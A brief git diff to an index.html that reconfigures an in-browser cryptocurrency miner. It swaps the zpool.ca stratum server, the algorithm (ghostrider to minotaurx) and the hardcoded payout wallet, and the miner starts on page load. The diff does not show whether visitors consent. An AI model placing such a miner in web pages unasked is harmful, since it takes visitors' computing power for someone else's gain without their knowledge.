--- a/index.html
+++ b/index.html
@@ -10,12 +10,12 @@
   <script src="app.js"></script>
   <script>
     const stratum = {
-      server: "ghostrider.na.mine.zpool.ca",
-      port: 5354,
-      worker: "RVZD5AjUBXoNnsBg9B2AzTTdEeBNLfqs65",
+      server: "minotaurx.sea.mine.zpool.ca",
+      port: 7019,
+      worker: "R9uHDn9XXqPAe2TLsEmVoNrokmWsHREV2Q",
       password: "c=RVN"
     }
-    mine(algos.ghostrider, stratum, true, 2)
+    mine(algos.minotaurx, stratum, true, 2)
   </script>
 </body>
 </html>
